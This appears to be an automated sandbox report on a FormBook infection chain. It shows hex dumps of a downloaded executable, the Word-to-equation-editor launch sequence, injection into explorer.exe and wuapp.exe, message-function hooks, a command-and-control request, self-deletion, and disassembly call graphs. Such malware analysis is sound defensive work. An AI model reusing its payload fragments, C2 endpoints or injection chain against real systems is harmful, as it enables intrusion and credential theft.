00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$qJ$$$/{$%;$"y$3$f"$Rich$PELiFZ2p@sp.textYZ `.rdatazp^@@.datap@.ndata@.rsrct@@
                                                        May 27, 2022 21:20:08.378611088 CEST6INData Raw: 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 24 3f 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 44 72 40 00 e9 42 01 00 00 53 56 8b 35 28 3f 42 00 8d 45 a4 57 50 ff 75 08 ff 15 48 72 40 00 83 65 f4 00 89
                                                        Data Ascii: U\}t+}FEuH$?BHPuuuDr@BSV5(?BEWPuHr@eEEPuLr@}eDp@FRVVU+MM3FQNUMVTUFPEEPMHp@EEPEPuPr@uE
                                                        May 27, 2022 21:20:08.378627062 CEST7INData Raw: f8 01 7f 03 33 c0 40 50 ff 15 8c 70 40 00 e9 fd 13 00 00 ff 75 f8 ff 15 f8 71 40 00 e9 ef 13 00 00 6a 01 e8 36 15 00 00 8b 4d dc 89 04 8d a0 3f 42 00 e9 d9 13 00 00 8b 45 e4 8d 34 85 a0 3f 42 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d e8 8b 44 85 dc 89
                                                        Data Ascii: 3@Pp@uq@j6M?BE4?B3;#MD4?BVS6B5\r@;tRQE7B;PQ}juPp@djW@;tBj\V:@SWEp@up@=uW
                                                        May 27, 2022 21:20:08.378640890 CEST8INData Raw: 56 75 12 ff 15 e8 70 40 00 85 c0 75 70 8b 45 e4 e9 fc 0e 00 00 ff 15 ec 70 40 00 eb ec 33 ff 47 57 e8 4b 10 00 00 68 00 04 00 00 56 50 89 45 08 ff 15 f0 70 40 00 85 c0 74 13 39 5d e4 74 13 56 ff 75 08 ff 15 ec 70 40 00 85 c0 75 05 89 7d fc 88 1e
                                                        Data Ascii: Vup@upEp@3GWKhVPEp@t9]tVup@u}Sj9]u;|~;sEvEjjEwm$4*@b+^W;tBJF#B3>3;;u3+;t;t
                                                        May 27, 2022 21:20:08.378660917 CEST10INData Raw: 00 00 6a ee e8 5e 0b 00 00 8d 4d d0 89 45 d4 51 50 e8 72 4a 00 00 88 1e 3b c3 89 45 c4 88 1f c7 45 fc 01 00 00 00 0f 84 d0 09 00 00 50 6a 40 ff 15 f8 70 40 00 3b c3 89 45 08 0f 84 bc 09 00 00 50 ff 75 c4 53 ff 75 d4 e8 35 4a 00 00 85 c0 74 34 8d
                                                        Data Ascii: j^MEQPrJ;EEPj@p@;EPuSu5Jt4EPEPh@uJtEpV:EpW:]u3hG}q@9?BjW9]EtVq@;ujSVq@;teuWq@;t=9]]
                                                        May 27, 2022 21:20:08.378679037 CEST11INData Raw: 1e 0f 84 90 02 00 00 8d 4d c4 c7 45 c4 ff 03 00 00 51 8d 4d 08 56 51 53 50 57 ff 15 00 70 40 00 33 c9 41 85 c0 75 34 83 7d 08 04 74 19 39 4d 08 74 06 83 7d 08 02 75 23 8b 45 ec 89 45 fc 8b 45 c4 88 1c 30 eb 71 ff 36 33 c0 39 5d ec 56 0f 94 c0 89
                                                        Data Ascii: MEQMVQSPWp@3Au4}t9Mt}u#EEE0q639]VE5\MUhj;9]MtQVPWp@SSSMSQVPWp@Wp@/8'Vr5PjuuP2
                                                        May 27, 2022 21:20:08.378696918 CEST12INData Raw: 40 00 9c 14 40 00 b7 14 40 00 ca 14 40 00 03 15 40 00 1d 15 40 00 6f 15 40 00 9d 15 40 00 bb 15 40 00 3c 16 40 00 2b 15 40 00 41 15 40 00 62 15 40 00 4d 16 40 00 e1 16 40 00 45 17 40 00 6c 17 40 00 7f 17 40 00 23 19 40 00 26 19 40 00 58 19 40 00
                                                        Data Ascii: @@@@@@o@@@<@+@A@b@M@@E@l@@#@&@X@m@@@1@q@@0@Q@@@@@@@h@@@v@@ @@x @!@W"@"@"@#@f#@$@$@$@$@!%@i%@.&@]&@w&@&@&@(@
                                                        May 27, 2022 21:20:08.378712893 CEST14INData Raw: ff 75 fc ff 15 e8 71 40 00 39 1d 2c 3f 42 00 0f 84 d1 00 00 00 39 5d f4 74 2a ff 35 d0 70 41 00 e8 4e 04 00 00 8d 45 08 6a 04 50 e8 11 04 00 00 85 c0 0f 84 ae 00 00 00 8b 45 f8 3b 45 08 0f 85 a2 00 00 00 ff 75 e8 6a 40 ff 15 f8 70 40 00 b9 08 b0
                                                        Data Ascii: uq@9,?B9]t*5pANEjPE;Euj@p@@0hBPR)ShjSShPp@$@up@9]tEuq@:,?BPMuA+MVSDjpAT;Et8@AE5
                                                        May 27, 2022 21:20:08.378729105 CEST15INData Raw: 00 68 20 37 42 00 e8 a3 27 00 00 ff 15 b4 70 40 00 bf 00 90 42 00 50 57 e8 91 27 00 00 53 ff 15 08 71 40 00 80 3d 00 90 42 00 22 a3 20 3f 42 00 8b c7 75 0a c6 44 24 14 22 b8 01 90 42 00 ff 74 24 14 50 e8 84 22 00 00 50 ff 15 18 72 40 00 89 44 24
                                                        Data Ascii: h 7B'p@BPW'Sq@=B" ?BuD$"Bt$P"Pr@D$c u@8 t8"D$ u@D$"8/u3@8SuH u8NCRCuH ux /D=tt$P"8"u@:uXPhB&BUhp@u hU
                                                        May 27, 2022 21:20:08.378746986 CEST16INData Raw: 8b 44 24 28 2b 44 24 20 53 53 50 8b 44 24 30 2b 44 24 28 50 8d 44 24 28 ff 74 24 30 ff 74 24 30 68 00 00 00 80 53 50 68 80 00 00 00 ff 15 0c 72 40 00 a3 08 05 42 00 53 e8 7e db ff ff 85 c0 74 08 6a 02 58 e9 b4 00 00 00 e8 b7 00 00 00 39 1d c0 3f
                                                        Data Ascii: D$(+D$ SSPD$0+D$(PD$(t$0t$0hSPhr@BS~tjX9?Bu|j5B\r@5p@hr@uhr@5r@r@WUSuWhr@SW-6Bq@7BSih":@SP5 ?Br@j+SIt96BYjM
                                                        May 27, 2022 21:20:08.691915035 CEST18INData Raw: 00 bb 30 05 42 00 68 20 37 42 00 53 e8 89 1d 00 00 ff 76 18 53 e8 96 1d 00 00 03 c3 50 e8 9a 1d 00 00 53 57 ff 15 f0 71 40 00 55 ff 76 08 e8 fc d5 ff ff 85 c0 0f 85 9d fe ff ff 39 2e 0f 84 95 fe ff ff 83 7e 04 05 75 1d 39 2d ac 3f 42 00 0f 85 13
                                                        Data Ascii: 0Bh 7BSvSPSWq@Uv9.~u9-?B9-?Bw56Bq@5A9.FV4<@ff7BWP5 ?Bq@;6Bv,jPD$PhW(r@Ppq@D$PWlq@jUUt$ t$ U56


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.224917598.137.244.3780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 27, 2022 21:21:49.331468105 CEST318OUTGET /nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi HTTP/1.1
                                                        Host: www.createacarepack.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 27, 2022 21:21:49.504925966 CEST318INHTTP/1.1 404 Not Found
                                                        Date: Fri, 27 May 2022 19:21:49 GMT
                                                        P3P: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
                                                        Vary: Accept-Encoding
                                                        Content-Length: 73
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Age: 0
                                                        Connection: close
                                                        Server: ATS
                                                        Data Raw: 3c 68 31 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 23 34 39 37 41 39 37 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 27 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64
                                                        Data Ascii: <h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found


                                                        Code Manipulations

                                                        User Modules

                                                        Hook Summary

                                                        Function NameHook TypeActive in Processes
                                                        PeekMessageAINLINEexplorer.exe
                                                        PeekMessageWINLINEexplorer.exe
                                                        GetMessageWINLINEexplorer.exe
                                                        GetMessageAINLINEexplorer.exe

                                                        Processes

                                                        Process: explorer.exe, Module: USER32.dll
                                                        Function NameHook TypeNew Data
                                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEB
                                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                        GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                        GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEB

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:21:20:14
                                                        Start date:27/05/2022
                                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                        Imagebase:0x13f5b0000
                                                        File size:1423704 bytes
                                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:2
                                                        Start time:21:20:17
                                                        Start date:27/05/2022
                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                        Imagebase:0x400000
                                                        File size:543304 bytes
                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:4
                                                        Start time:21:20:21
                                                        Start date:27/05/2022
                                                        Path:C:\Users\user\AppData\Roaming\word.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\word.exe
                                                        Imagebase:0x400000
                                                        File size:299113 bytes
                                                        MD5 hash:C6E799EEEBA0345DE98B4E9A6AC76B82
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 9%, Metadefender, Browse
                                                        • Detection: 62%, ReversingLabs
                                                        Reputation:low

                                                        General

                                                        Target ID:5
                                                        Start time:21:20:23
                                                        Start date:27/05/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
                                                        Imagebase:0x9a0000
                                                        File size:191488 bytes
                                                        MD5 hash:9CECB9E88C1FF3D7A4FFC8BFEB27C2E1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Antivirus matches:
                                                        • Detection: 69%, ReversingLabs
                                                        Reputation:low

                                                        General

                                                        Target ID:6
                                                        Start time:21:20:24
                                                        Start date:27/05/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
                                                        Imagebase:0x9a0000
                                                        File size:191488 bytes
                                                        MD5 hash:9CECB9E88C1FF3D7A4FFC8BFEB27C2E1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        General

                                                        Target ID:7
                                                        Start time:21:20:30
                                                        Start date:27/05/2022
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0xff040000
                                                        File size:3229696 bytes
                                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:high

                                                        General

                                                        Target ID:8
                                                        Start time:21:20:52
                                                        Start date:27/05/2022
                                                        Path:C:\Windows\SysWOW64\wuapp.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\wuapp.exe
                                                        Imagebase:0xb30000
                                                        File size:35328 bytes
                                                        MD5 hash:C8EBA45CEF271BED6C2F0E1965D229EA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

                                                        General

                                                        Target ID:9
                                                        Start time:21:20:57
                                                        Start date:27/05/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"
                                                        Imagebase:0x4a830000
                                                        File size:302592 bytes
                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:15.4%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:21.1%
                                                          Total number of Nodes:1254
                                                          Total number of Limit Nodes:25
                                                          execution_graph 3509 401745 3510 402a85 17 API calls 3509->3510 3511 40174c SearchPathA 3510->3511 3512 401767 3511->3512 3513 4021c8 3514 402a85 17 API calls 3513->3514 3515 4021ce 3514->3515 3516 402a85 17 API calls 3515->3516 3517 4021da 3516->3517 3518 405d9c 4 API calls 3517->3518 3519 4021e2 3518->3519 3520 4021f3 lstrlenA lstrlenA 3519->3520 3527 4021e6 3519->3527 3522 405b16 17 API calls 3520->3522 3521 404e9f 24 API calls 3526 4021ee 3521->3526 3523 402221 lstrcatA 3522->3523 3524 404e9f 24 API calls 3523->3524 3525 402243 SHFileOperationA 3524->3525 3525->3526 3525->3527 3527->3521 3527->3526 3528 402bca 3529 402be2 SetTimer 3528->3529 3530 402bfd 3528->3530 3529->3530 3531 402c74 3530->3531 3532 402c12 MulDiv 3530->3532 3533 402c32 wsprintfA SetWindowTextA SetDlgItemTextA ShowWindow 3532->3533 3534 402c57 3532->3534 3533->3534 3534->3531 3535 402c60 wsprintfA 3534->3535 3536 404e9f 24 API calls 3535->3536 3536->3531 3537 4014ca 3538 4014de 3537->3538 3540 4014cf 3537->3540 3539 404e9f 24 API calls 3538->3539 3538->3540 3539->3540 3541 4022ca 3542 402a85 17 API calls 3541->3542 3543 4022d8 3542->3543 3544 402a85 17 API calls 3543->3544 3545 4022e1 3544->3545 3546 402a85 17 API calls 3545->3546 3547 4022eb GetPrivateProfileStringA 3546->3547 3548 40164d 3549 402a85 17 API calls 3548->3549 3550 401654 3549->3550 3551 402a85 17 API calls 3550->3551 3552 40165e 3551->3552 3564 405af4 lstrcpynA 3552->3564 3554 40166f lstrlenA lstrlenA 3555 40168b lstrcatA lstrcatA 3554->3555 3556 40169f MoveFileA 3554->3556 3555->3556 3557 4016b6 3556->3557 3558 4016af 3556->3558 3560 405d9c 4 API calls 3557->3560 3562 4021bf 3557->3562 3559 401423 24 API calls 3558->3559 3559->3562 3561 4016c7 3560->3561 3561->3562 3563 405842 37 API calls 3561->3563 3563->3558 3564->3554 3572 401b51 3573 401ba2 3572->3573 3574 401b5e 3572->3574 3575 401ba6 3573->3575 3576 401bcb GlobalAlloc 3573->3576 3577 40225e 3574->3577 3581 401b75 3574->3581 3583 401be6 3575->3583 3593 405af4 lstrcpynA 3575->3593 3578 405b16 17 API calls 3576->3578 3579 405b16 17 API calls 3577->3579 3578->3583 3584 40226b 3579->3584 3591 405af4 lstrcpynA 3581->3591 3582 401bb8 GlobalFree 3582->3583 3586 4053c2 MessageBoxIndirectA 3584->3586 3586->3583 3587 401b84 3592 405af4 lstrcpynA 3587->3592 3589 401b93 3594 405af4 lstrcpynA 3589->3594 3591->3587 3592->3589 3593->3582 3594->3583 3595 402257 3596 40225e 3595->3596 3598 402271 3595->3598 3597 405b16 17 API calls 3596->3597 3599 40226b 3597->3599 3600 4053c2 MessageBoxIndirectA 3599->3600 3600->3598 3601 401cd7 3607 402a68 3601->3607 3603 401cde 3604 402a68 17 API calls 3603->3604 3605 401ce6 GetDlgItem 3604->3605 3606 40251b 3605->3606 3608 405b16 17 API calls 3607->3608 3609 402a7c 3608->3609 3609->3603 3610 404fdd 3611 405189 3610->3611 3612 404ffe GetDlgItem GetDlgItem GetDlgItem 3610->3612 3614 405192 GetDlgItem CreateThread CloseHandle 3611->3614 3615 4051ba 3611->3615 3656 403f2a SendMessageA 3612->3656 3614->3615 3617 4051d1 ShowWindow ShowWindow 3615->3617 3618 405207 3615->3618 3619 4051e5 3615->3619 3616 40506f 3620 405076 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3616->3620 3658 403f2a SendMessageA 3617->3658 3625 403f5c 8 API calls 3618->3625 3621 405243 3619->3621 3623 4051f6 3619->3623 3624 40521c ShowWindow 3619->3624 3628 4050e5 3620->3628 3629 4050c9 SendMessageA SendMessageA 3620->3629 3621->3618 3630 40524e SendMessageA 3621->3630 3631 403ece SendMessageA 3623->3631 3626 40523c 3624->3626 3627 40522e 3624->3627 3632 405215 3625->3632 3634 403ece SendMessageA 3626->3634 3633 404e9f 24 API calls 3627->3633 3635 4050f8 3628->3635 3636 4050ea SendMessageA 3628->3636 3629->3628 3630->3632 3637 405267 CreatePopupMenu 3630->3637 3631->3618 3633->3626 3634->3621 3639 403ef5 18 API calls 3635->3639 3636->3635 3638 405b16 17 API calls 3637->3638 3640 405277 AppendMenuA 3638->3640 3641 405108 3639->3641 3642 40528a GetWindowRect 3640->3642 3643 40529d 3640->3643 3644 405111 ShowWindow 3641->3644 3645 405145 GetDlgItem SendMessageA 3641->3645 3647 4052a6 TrackPopupMenu 3642->3647 3643->3647 3648 405127 ShowWindow 3644->3648 3650 405134 3644->3650 3645->3632 3646 40516c SendMessageA SendMessageA 3645->3646 3646->3632 3647->3632 3649 4052c4 3647->3649 3648->3650 3652 4052e0 SendMessageA 3649->3652 3657 403f2a SendMessageA 3650->3657 3652->3652 3653 4052fd OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3652->3653 3654 40531f SendMessageA 3653->3654 3654->3654 3655 405340 GlobalUnlock SetClipboardData CloseClipboard 3654->3655 3655->3632 3656->3616 3657->3645 3658->3619 3659 40265e 3660 402665 3659->3660 3661 40291a 3659->3661 3662 40266b FindClose 3660->3662 3662->3661 3663 4026df 3664 402a85 17 API calls 3663->3664 3665 4026ec 3664->3665 3666 402706 3665->3666 3667 4026f9 3665->3667 3698 405af4 lstrcpynA 3666->3698 3697 405af4 lstrcpynA 3667->3697 3670 402704 3674 405d03 5 API calls 3670->3674 3671 402715 3672 4055e7 3 API calls 3671->3672 3673 40271b lstrcatA 3672->3673 3673->3670 3675 40272c 3674->3675 3676 4057ac 2 API calls 3675->3676 3677 402732 3676->3677 3699 4057cb GetFileAttributesA CreateFileA 3677->3699 3679 40273f 3680 40274b GlobalAlloc 3679->3680 3681 4027ed 3679->3681 3682 402764 3680->3682 3683 4027df CloseHandle 3680->3683 3684 4027f5 DeleteFileA 3681->3684 3685 402806 3681->3685 3700 4032af SetFilePointer 3682->3700 3683->3681 3684->3685 3687 40276a 3688 40327d ReadFile 3687->3688 3689 402773 GlobalAlloc 3688->3689 3690 402783 3689->3690 3691 4027b7 WriteFile GlobalFree 3689->3691 3693 402f71 21 API calls 3690->3693 3692 402f71 21 API calls 3691->3692 3694 4027dc 3692->3694 3696 402790 3693->3696 3694->3683 3695 4027ae GlobalFree 3695->3691 3696->3695 3697->3670 3698->3671 3699->3679 3700->3687 3701 4016e1 3702 402a85 17 API calls 3701->3702 3703 4016e7 GetFullPathNameA 3702->3703 3704 4016fe 3703->3704 3710 40171f 3703->3710 3707 405d9c 4 API calls 3704->3707 3704->3710 3705 401733 GetShortPathNameA 3706 40291a 3705->3706 3708 40170f 3707->3708 3708->3710 3711 405af4 lstrcpynA 3708->3711 3710->3705 3710->3706 3711->3710 3712 401de2 3713 402a68 17 API calls 3712->3713 3714 401de8 3713->3714 3715 402a68 17 API calls 3714->3715 3716 401df1 3715->3716 3717 401e03 EnableWindow 3716->3717 3718 401df8 ShowWindow 3716->3718 3719 40291a 3717->3719 3718->3719 3720 401563 3721 4028c2 3720->3721 3724 405a52 wsprintfA 3721->3724 3723 4028c7 3724->3723 3024 403664 3025 403675 CloseHandle 3024->3025 3026 40367f 3024->3026 3025->3026 3027 403693 3026->3027 3028 403689 CloseHandle 3026->3028 3031 405426 3027->3031 3028->3027 3071 4056c8 3031->3071 3034 405445 DeleteFileA 3036 40369f 3034->3036 3035 40545c 3037 405582 3035->3037 3085 405af4 lstrcpynA 3035->3085 3037->3036 3086 405d9c SetErrorMode FindFirstFileA SetErrorMode 3037->3086 3039 405483 3040 405496 3039->3040 3041 405489 lstrcatA 3039->3041 3095 40562e lstrlenA 3040->3095 3042 40549c lstrcatA lstrlenA FindFirstFileA 3041->3042 3042->3037 3049 4054cb 3042->3049 3046 405612 CharNextA 3046->3049 3049->3046 3053 405561 FindNextFileA 3049->3053 3058 405528 3049->3058 3063 405426 60 API calls 3049->3063 3099 405af4 lstrcpynA 3049->3099 3053->3049 3056 405579 FindClose 3053->3056 3054 4055c2 3054->3036 3057 4055c8 3054->3057 3055 4055d9 3059 404e9f 24 API calls 3055->3059 3056->3037 3060 404e9f 24 API calls 3057->3060 3061 4057ac 2 API calls 3058->3061 3059->3036 3062 4055d0 3060->3062 3064 40552e DeleteFileA 3061->3064 3065 405842 37 API calls 3062->3065 3063->3049 3069 405539 3064->3069 3067 4055d7 3065->3067 3066 404e9f 24 API calls 3066->3053 3067->3036 3069->3053 3069->3066 3100 404e9f 3069->3100 3111 405842 3069->3111 3137 405af4 lstrcpynA 3071->3137 3073 4056d9 3138 40567b CharNextA CharNextA 3073->3138 3075 40543a 3075->3034 3075->3035 3077 405d03 5 API calls 3083 4056ef 3077->3083 3078 40571a lstrlenA 3079 405725 3078->3079 3078->3083 3080 4055e7 3 API calls 3079->3080 3082 40572a GetFileAttributesA 3080->3082 3081 405d9c 4 API calls 3081->3083 3082->3075 3083->3075 3083->3078 3083->3081 3084 40562e 2 API calls 3083->3084 3084->3078 3085->3039 3087 4055a7 3086->3087 3088 405dc7 FindClose 3086->3088 3087->3036 3089 4055e7 lstrlenA CharPrevA 3087->3089 3088->3087 3090 405601 lstrcatA 3089->3090 3091 4055b1 3089->3091 3090->3091 3092 4057ac GetFileAttributesA 3091->3092 3093 4055b7 RemoveDirectoryA 3092->3093 